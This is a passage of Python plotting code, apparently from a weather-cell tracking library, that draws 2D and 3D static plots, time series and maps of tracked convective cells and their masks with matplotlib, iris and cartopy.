'x', color=color,markersize=4)
#Create surface projection of mask for the respective cell and plot it in the right color
z_coord = 'model_level_number'
if len(mask_total.shape)==3:
mask_total_i_surface = mask_cell_surface(mask_total, cell, track, masked=False, z_coord=z_coord)
elif len(mask_total.shape)==2:
mask_total_i_surface=mask_total
axes.contour((mask_total_i_surface.coord('projection_x_coordinate').points-x_pos)/1000,
(mask_total_i_surface.coord('projection_y_coordinate').points-y_pos)/1000,
mask_total_i_surface.data,
levels=[0, cell], colors=color, linestyles=':',linewidth=1)
if cog is not None:
for i_row, row in cog.iterrows():
cell = row['cell']
if cell==cell_i:
color='darkred'
else:
color='darkorange'
# plot marker for centre of gravity as a circle
axes.plot((row['x_M']-x_pos)/1000, (row['y_M']-y_pos)/1000,
'o', markeredgecolor=color, markerfacecolor='None',markersize=4)
if features is not None:
for i_row, row in features.iterrows():
color='purple'
axes.plot((row['projection_x_coordinate']-x_pos)/1000,
(row['projection_y_coordinate']-y_pos)/1000,
'+', color=color,markersize=3)
axes.set_xlabel('x (km)')
axes.set_ylabel('y (km)')
axes.set_xlim([-1*width/1000, width/1000])
axes.set_ylim([-1*width/1000, width/1000])
axes.xaxis.set_label_position('top')
axes.xaxis.set_ticks_position('top')
axes.set_title(title,pad=35,fontsize=10,horizontalalignment='left',loc='left')
return axes
def plot_mask_cell_track_static(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
**kwargs):
'''Make plots for all cells with fixed frame including entire development of the cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
# for i_row,row in track_cell.iterrows():
# time_i=row['time']
# constraint_time = Constraint(time=row['time'])
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=figsize)
fig1.subplots_adjust(left=0.2, bottom=0.15, right=0.80, top=0.85)
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
ax1=plot_mask_cell_individual_static(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1,title=title,**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_individual_static(cell_i,track, cog, features, mask_total,
field_contour, field_filled,
axes=None,xlim=None,ylim=None,
label_field_contour=None, cmap_field_contour='Blues',norm_field_contour=None,
linewidths_contour=0.8,contour_labels=False,
vmin_field_contour=0,vmax_field_contour=50,levels_field_contour=None,nlevels_field_contour=10,
label_field_filled=None,cmap_field_filled='summer',norm_field_filled=None,
vmin_field_filled=0,vmax_field_filled=100,levels_field_filled=None,nlevels_field_filled=10,
title=None,feature_number=False
):
'''Make plots for cell in fixed frame and with one background field as filling and one background field as contrours
Input:
Output:
'''
import numpy as np
from .utils import mask_features,mask_features_surface
from mpl_toolkits.axes_grid1 import make_axes_locatable
from matplotlib.colors import Normalize
divider = make_axes_locatable(axes)
if field_filled is not None:
if levels_field_filled is None:
levels_field_filled=np.linspace(vmin_field_filled,vmax_field_filled, 10)
plot_field_filled = axes.contourf(field_filled.coord('projection_x_coordinate').points/1000,
field_filled.coord('projection_y_coordinate').points/1000,
field_filled.data,
levels=levels_field_filled, norm=norm_field_filled,
cmap=cmap_field_filled, vmin=vmin_field_filled, vmax=vmax_field_filled)
cax_filled = divider.append_axes("right", size="5%", pad=0.1)
norm_filled= Normalize(vmin=vmin_field_filled, vmax=vmax_field_filled)
sm1= plt.cm.ScalarMappable(norm=norm_filled, cmap = plot_field_filled.cmap)
sm1.set_array([])
cbar_field_filled = plt.colorbar(sm1, orientation='vertical',cax=cax_filled)
cbar_field_filled.ax.set_ylabel(label_field_filled)
cbar_field_filled.set_clim(vmin_field_filled, vmax_field_filled)
if field_contour is not None:
if levels_field_contour is None:
levels_field_contour=np.linspace(vmin_field_contour, vmax_field_contour, 5)
plot_field_contour = axes.contour(field_contour.coord('projection_x_coordinate').points/1000,
field_contour.coord('projection_y_coordinate').points/1000,
field_contour.data,
cmap=cmap_field_contour,norm=norm_field_contour,
levels=levels_field_contour,vmin=vmin_field_contour, vmax=vmax_field_contour,
linewidths=linewidths_contour)
if contour_labels:
axes.clabel(plot_field_contour, fontsize=10)
cax_contour = divider.append_axes("bottom", size="5%", pad=0.1)
if norm_field_contour:
vmin_field_contour=None
vmax_field_contour=None
norm_contour=norm_field_contour
else:
norm_contour= Normalize(vmin=vmin_field_contour, vmax=vmax_field_contour)
sm_contour= plt.cm.ScalarMappable(norm=norm_contour, cmap = plot_field_contour.cmap)
sm_contour.set_array([])
cbar_field_contour = plt.colorbar(sm_contour, orientation='horizontal',ticks=levels_field_contour,cax=cax_contour)
cbar_field_contour.ax.set_xlabel(label_field_contour)
cbar_field_contour.set_clim(vmin_field_contour, vmax_field_contour)
for i_row, row in track.iterrows():
cell = row['cell']
feature = row['feature']
# logging.debug("cell: "+ str(row['cell']))
# logging.debug("feature: "+ str(row['feature']))
if cell==cell_i:
color='darkred'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
elif np.isnan(cell):
color='gray'
if feature_number:
cell_string=' '+'('+str(int(feature))+')'
else:
cell_string=' '
else:
color='darkorange'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
axes.text(row['projection_x_coordinate']/1000,
row['projection_y_coordinate']/1000,
cell_string,color=color,fontsize=6, clip_on=True)
# Plot marker for tracked cell centre as a cross
axes.plot(row['projection_x_coordinate']/1000,
row['projection_y_coordinate']/1000,
'x', color=color,markersize=4)
#Create surface projection of mask for the respective cell and plot it in the right color
z_coord = 'model_level_number'
if len(mask_total.shape)==3:
mask_total_i_surface = mask_features_surface(mask_total, feature, masked=False, z_coord=z_coord)
elif len(mask_total.shape)==2:
mask_total_i_surface=mask_features(mask_total, feature, masked=False, z_coord=z_coord)
axes.contour(mask_total_i_surface.coord('projection_x_coordinate').points/1000,
mask_total_i_surface.coord('projection_y_coordinate').points/1000,
mask_total_i_surface.data,
levels=[0, feature], colors=color, linestyles=':',linewidth=1)
if cog is not None:
for i_row, row in cog.iterrows():
cell = row['cell']
if cell==cell_i:
color='darkred'
else:
color='darkorange'
# plot marker for centre of gravity as a circle
axes.plot(row['x_M']/1000, row['y_M']/1000,
'o', markeredgecolor=color, markerfacecolor='None',markersize=4)
if features is not None:
for i_row, row in features.iterrows():
color='purple'
axes.plot(row['projection_x_coordinate']/1000,
row['projection_y_coordinate']/1000,
'+', color=color,markersize=3)
axes.set_xlabel('x (km)')
axes.set_ylabel('y (km)')
axes.set_xlim(xlim)
axes.set_ylim(ylim)
axes.xaxis.set_label_position('top')
axes.xaxis.set_ticks_position('top')
axes.set_title(title,pad=35,fontsize=10,horizontalalignment='left',loc='left')
return axes
def plot_mask_cell_track_2D3Dstatic(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
ele=10,azim=30,
**kwargs):
'''Make plots for all cells with fixed frame including entire development of the cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.gridspec as gridspec
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
# for i_row,row in track_cell.iterrows():
# time_i=row['time']
# constraint_time = Constraint(time=row['time'])
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
fig1=plt.figure(figsize=(20 / 2.54, 10 / 2.54))
fig1.subplots_adjust(left=0.1, bottom=0.15, right=0.9, top=0.9,wspace=0.3, hspace=0.25)
# make two subplots for figure:
gs1 = gridspec.GridSpec(1, 2,width_ratios=[1,1.2])
fig1.add_subplot(gs1[0])
fig1.add_subplot(gs1[1], projection='3d')
ax1 = fig1.get_axes()
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
ax1[0]=plot_mask_cell_individual_static(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1[0],title=title,**kwargs)
ax1[1]=plot_mask_cell_individual_3Dstatic(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1[1],title=title,
ele=ele,azim=azim,
**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static 2d/3D plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static 2d/3D plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_track_3Dstatic(cell,track, cog, features, mask_total,
field_contour, field_filled,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(10/2.54, 10/2.54),dpi=300,
**kwargs):
'''Make plots for all cells with fixed frame including entire development of the cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
from mpl_toolkits.mplot3d import Axes3D
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
# for i_row,row in track_cell.iterrows():
# time_i=row['time']
# constraint_time = Constraint(time=row['time'])
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
# fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=figsize)
# fig1.subplots_adjust(left=0.2, bottom=0.15, right=0.80, top=0.85)
fig1, ax1 = plt.subplots(ncols=1, nrows=1, figsize=(10/2.54, 10/2.54), subplot_kw={'projection': '3d'})
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=datestring_stamp + ' , ' + celltime_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
ax1=plot_mask_cell_individual_3Dstatic(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1,title=title,**kwargs)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def plot_mask_cell_individual_3Dstatic(cell_i,track, cog, features, mask_total,
field_contour, field_filled,
axes=None,xlim=None,ylim=None,
label_field_contour=None, cmap_field_contour='Blues',norm_field_contour=None,
linewidths_contour=0.8,contour_labels=False,
vmin_field_contour=0,vmax_field_contour=50,levels_field_contour=None,nlevels_field_contour=10,
label_field_filled=None,cmap_field_filled='summer',norm_field_filled=None,
vmin_field_filled=0,vmax_field_filled=100,levels_field_filled=None,nlevels_field_filled=10,
title=None,feature_number=False,
ele=10.,azim=210.
):
'''Make plots for cell in fixed frame and with one background field as filling and one background field as contrours
Input:
Output:
'''
import numpy as np
from .utils import mask_features,mask_features_surface
# from mpl_toolkits.axes_grid1 import make_axes_locatable
# from matplotlib.colors import Normalize
from mpl_toolkits.mplot3d import Axes3D
axes.view_init(elev=ele, azim=azim)
axes.grid(b=False)
axes.set_frame_on(False)
# make the panes transparent
axes.xaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
axes.yaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
axes.zaxis.set_pane_color((1.0, 1.0, 1.0, 0.0))
# make the grid lines transparent
axes.xaxis._axinfo["grid"]['color'] = (1,1,1,0)
axes.yaxis._axinfo["grid"]['color'] = (1,1,1,0)
axes.zaxis._axinfo["grid"]['color'] = (1,1,1,0)
if title is not None:
axes.set_title(title,horizontalalignment='left',loc='left')
# colors_mask = ['pink','darkred', 'orange', 'darkred', 'red', 'darkorange']
x = mask_total.coord('projection_x_coordinate').points
y = mask_total.coord('projection_y_coordinate').points
z = mask_total.coord('model_level_number').points
# z = mask_total.coord('geopotential_height').points
zz, yy, xx = np.meshgrid(z, y, x, indexing='ij')
# z_alt = mask_total.coord('geopotential_height').points
# divider = make_axes_locatable(axes)
# if field_filled is not None:
# if levels_field_filled is None:
# levels_field_filled=np.linspace(vmin_field_filled,vmax_field_filled, 10)
# plot_field_filled = axes.contourf(field_filled.coord('projection_x_coordinate').points/1000,
# field_filled.coord('projection_y_coordinate').points/1000,
# field_filled.data,
# levels=levels_field_filled, norm=norm_field_filled,
# cmap=cmap_field_filled, vmin=vmin_field_filled, vmax=vmax_field_filled)
# cax_filled = divider.append_axes("right", size="5%", pad=0.1)
# norm_filled= Normalize(vmin=vmin_field_filled, vmax=vmax_field_filled)
# sm1= plt.cm.ScalarMappable(norm=norm_filled, cmap = plot_field_filled.cmap)
# sm1.set_array([])
# cbar_field_filled = plt.colorbar(sm1, orientation='vertical',cax=cax_filled)
# cbar_field_filled.ax.set_ylabel(label_field_filled)
# cbar_field_filled.set_clim(vmin_field_filled, vmax_field_filled)
# if field_contour is not None:
# if levels_field_contour is None:
# levels_field_contour=np.linspace(vmin_field_contour, vmax_field_contour, 5)
# plot_field_contour = axes.contour(field_contour.coord('projection_x_coordinate').points/1000,
# field_contour.coord('projection_y_coordinate').points/1000,
# field_contour.data,
# cmap=cmap_field_contour,norm=norm_field_contour,
# levels=levels_field_contour,vmin=vmin_field_contour, vmax=vmax_field_contour,
# linewidths=linewidths_contour)
# if contour_labels:
# axes.clabel(plot_field_contour, fontsize=10)
# cax_contour = divider.append_axes("bottom", size="5%", pad=0.1)
# if norm_field_contour:
# vmin_field_contour=None
# vmax_field_contour=None
# norm_contour=norm_field_contour
# else:
# norm_contour= Normalize(vmin=vmin_field_contour, vmax=vmax_field_contour)
#
# sm_contour= plt.cm.ScalarMappable(norm=norm_contour, cmap = plot_field_contour.cmap)
# sm_contour.set_array([])
#
# cbar_field_contour = plt.colorbar(sm_contour, orientation='horizontal',ticks=levels_field_contour,cax=cax_contour)
# cbar_field_contour.ax.set_xlabel(label_field_contour)
# cbar_field_contour.set_clim(vmin_field_contour, vmax_field_contour)
#
for i_row, row in track.iterrows():
cell = row['cell']
feature = row['feature']
# logging.debug("cell: "+ str(row['cell']))
# logging.debug("feature: "+ str(row['feature']))
if cell==cell_i:
color='darkred'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
elif np.isnan(cell):
color='gray'
if feature_number:
cell_string=' '+'('+str(int(feature))+')'
else:
cell_string=' '
else:
color='darkorange'
if feature_number:
cell_string=' '+str(int(cell))+' ('+str(int(feature))+')'
else:
cell_string=' '+str(int(cell))
# axes.text(row['projection_x_coordinate']/1000,
# row['projection_y_coordinate']/1000,
# 0,
# cell_string,color=color,fontsize=6, clip_on=True)
# # Plot marker for tracked cell centre as a cross
# axes.plot(row['projection_x_coordinate']/1000,
# row['projection_y_coordinate']/1000,
# 0,
# 'x', color=color,markersize=4)
#Create surface projection of mask for the respective cell and plot it in the right color
# z_coord = 'model_level_number'
# if len(mask_total.shape)==3:
# mask_total_i_surface = mask_features_surface(mask_total, feature, masked=False, z_coord=z_coord)
# elif len(mask_total.shape)==2:
# mask_total_i_surface=mask_features(mask_total, feature, masked=False, z_coord=z_coord)
# axes.contour(mask_total_i_surface.coord('projection_x_coordinate').points/1000,
# mask_total_i_surface.coord('projection_y_coordinate').points/1000,
# 0,
# mask_total_i_surface.data,
# levels=[0, feature], colors=color, linestyles=':',linewidth=1)
mask_feature = mask_total.data == feature
axes.scatter(
# xx[mask_feature]/1000, yy[mask_feature]/1000, zz[mask_feature]/1000,
xx[mask_feature]/1000, yy[mask_feature]/1000, zz[mask_feature],
c=color, marker=',',
s=5,#60000.0 * TWC_i[Mask_particle],
alpha=0.3, cmap='inferno', label=cell_string,rasterized=True)
axes.set_xlim(xlim)
axes.set_ylim(ylim)
axes.set_zlim([0, 100])
# axes.set_zlim([0, 20])
# axes.set_zticks([0, 5,10,15, 20])
axes.set_xlabel('x (km)')
axes.set_ylabel('y (km)')
axes.zaxis.set_rotate_label(False) # disable automatic rotation
# axes.set_zlabel('z (km)', rotation=90)
axes.set_zlabel('model level', rotation=90)
return axes
def plot_mask_cell_track_static_timeseries(cell,track, cog, features, mask_total,
field_contour, field_filled,
track_variable=None,variable=None,variable_ylabel=None,variable_label=[None],variable_legend=False,variable_color=None,
width=10000,n_extend=1,
name= 'test', plotdir='./',
file_format=['png'],figsize=(20/2.54, 10/2.54),dpi=300,
**kwargs):
'''Make plots for all cells with fixed frame including entire development of the cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
'''Make plots for all cells with fixed frame including entire development of the cell and with one background field as filling and one background field as contrours
Input:
Output:
'''
from iris import Constraint
from numpy import unique
import os
import pandas as pd
track_cell=track[track['cell']==cell]
x_min=track_cell['projection_x_coordinate'].min()-width
x_max=track_cell['projection_x_coordinate'].max()+width
y_min=track_cell['projection_y_coordinate'].min()-width
y_max=track_cell['projection_y_coordinate'].max()+width
time_min=track_cell['time'].min()
# time_max=track_cell['time'].max()
track_variable_cell=track_variable[track_variable['cell']==cell]
track_variable_cell['time_cell']=pd.to_timedelta(track_variable_cell['time_cell'])
# track_variable_cell=track_variable_cell[(track_variable_cell['time']>=time_min) & (track_variable_cell['time']<=time_max)]
#set up looping over time based on mask's time coordinate to allow for one timestep before and after the track
time_coord=mask_total.coord('time')
time=time_coord.units.num2date(time_coord.points)
i_start=max(0,np.where(time==track_cell['time'].values[0])[0][0]-n_extend)
i_end=min(len(time)-1,np.where(time==track_cell['time'].values[-1])[0][0]+n_extend+1)
time_cell=time[slice(i_start,i_end)]
for time_i in time_cell:
constraint_time = Constraint(time=time_i)
constraint_x = Constraint(projection_x_coordinate = lambda cell: x_min < cell < x_max)
constraint_y = Constraint(projection_y_coordinate = lambda cell: y_min < cell < y_max)
constraint = constraint_time & constraint_x & constraint_y
mask_total_i=mask_total.extract(constraint)
if field_contour is None:
field_contour_i=None
else:
field_contour_i=field_contour.extract(constraint)
if field_filled is None:
field_filled_i=None
else:
field_filled_i=field_filled.extract(constraint)
track_i=track[track['time']==time_i]
cells_mask=list(unique(mask_total_i.core_data()))
track_cells=track_i.loc[(track_i['projection_x_coordinate'] > x_min) & (track_i['projection_x_coordinate'] < x_max) & (track_i['projection_y_coordinate'] > y_min) & (track_i['projection_y_coordinate'] < y_max)]
cells_track=list(track_cells['cell'].values)
cells=list(set( cells_mask + cells_track ))
if cell not in cells:
cells.append(cell)
if 0 in cells:
cells.remove(0)
track_i=track_i[track_i['cell'].isin(cells)]
if cog is None:
cog_i=None
else:
cog_i=cog[cog['cell'].isin(cells)]
cog_i=cog_i[cog_i['time']==time_i]
if features is None:
features_i=None
else:
features_i=features[features['time']==time_i]
fig1, ax1 = plt.subplots(ncols=2, nrows=1, figsize=figsize)
fig1.subplots_adjust(left=0.1, bottom=0.15, right=0.90, top=0.85,wspace=0.3)
datestring_stamp = time_i.strftime('%Y-%m-%d %H:%M:%S')
if time_i in track_cell['time'].values:
time_cell_i=track_cell[track_cell['time'].values==time_i]['time_cell']
celltime_stamp = "%02d:%02d:%02d" % (time_cell_i.dt.total_seconds() // 3600,
(time_cell_i.dt.total_seconds() % 3600) // 60,
time_cell_i.dt.total_seconds() % 60 )
else:
celltime_stamp=' - '
title=celltime_stamp + ' , ' + datestring_stamp
datestring_file = time_i.strftime('%Y-%m-%d_%H%M%S')
# plot evolving timeseries of variable to second axis:
ax1[0]=plot_mask_cell_individual_static(cell_i=cell,
track=track_i, cog=cog_i,features=features_i,
mask_total=mask_total_i,
field_contour=field_contour_i, field_filled=field_filled_i,
xlim=[x_min/1000,x_max/1000],ylim=[y_min/1000,y_max/1000],
axes=ax1[0],title=title,**kwargs)
track_variable_past=track_variable_cell[(track_variable_cell['time']>=time_min) & (track_variable_cell['time']<=time_i)]
track_variable_current=track_variable_cell[track_variable_cell['time']==time_i]
if variable_color is None:
variable_color='navy'
if type(variable) is str:
# logging.debug('variable: '+str(variable))
if type(variable_color) is str:
variable_color={variable:variable_color}
variable=[variable]
for i_variable,variable_i in enumerate(variable):
color=variable_color[variable_i]
ax1[1].plot(track_variable_past['time_cell'].dt.total_seconds()/ 60.,track_variable_past[variable_i].values,color=color,linestyle='-',label=variable_label[i_variable])
ax1[1].plot(track_variable_current['time_cell'].dt.total_seconds()/ 60.,track_variable_current[variable_i].values,color=color,marker='o',markersize=4,fillstyle='full')
ax1[1].yaxis.tick_right()
ax1[1].yaxis.set_label_position("right")
ax1[1].set_xlim([0,2*60])
ax1[1].set_xticks(np.arange(0,120,15))
ax1[1].set_ylim([0,max(10,1.25*track_variable_cell[variable].max().max())])
ax1[1].set_xlabel('cell lifetime (min)')
if variable_ylabel==None:
variable_ylabel=variable
ax1[1].set_ylabel(variable_ylabel)
ax1[1].set_title(title)
# insert legend, if flag is True
if variable_legend:
if (len(variable_label)<5):
ncol=1
else:
ncol=2
ax1[1].legend(loc='upper right', bbox_to_anchor=(1, 1),ncol=ncol,fontsize=8)
out_dir = os.path.join(plotdir, name)
os.makedirs(out_dir, exist_ok=True)
if 'png' in file_format:
savepath_png = os.path.join(out_dir, name + '_' + datestring_file + '.png')
fig1.savefig(savepath_png, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_png)
if 'pdf' in file_format:
savepath_pdf = os.path.join(out_dir, name + '_' + datestring_file + '.pdf')
fig1.savefig(savepath_pdf, dpi=dpi)
logging.debug('Mask static plot saved to ' + savepath_pdf)
plt.close()
plt.clf()
def map_tracks(track,axis_extent=None,figsize=(10,10),axes=None):
for cell in track['cell'].dropna().unique():
track_i=track[track['cell']==cell]
axes.plot(track_i['longitude'],track_i['latitude'],'-')
if axis_extent:
axes.set_extent(axis_extent)
axes=make_map(axes)
return axes
def make_map(axes):
import matplotlib.ticker as mticker
import cartopy.crs as ccrs
from cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER
gl = axes.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,
linewidth=2, color='gray', alpha=0.5, linestyle='-')
axes.coastlines('10m')
gl.xlabels_top = False
gl.ylabels_right = False
gl.xlocator = mticker.MaxNLocator(nbins=5,min_n_ticks=3,steps=None)
gl.ylocator = mticker.MaxNLocator(nbins=5,min_n_ticks=3,steps=None)
gl.xformatter = LONGITUDE_FORMATTER
gl.yformatter = LATITUDE_FORMATTER
#gl.xlabel_style = {'size': 15, 'color': 'gray'}
#gl.xlabel_style = {'color': 'red', 'weight': 'bold'}
return axes
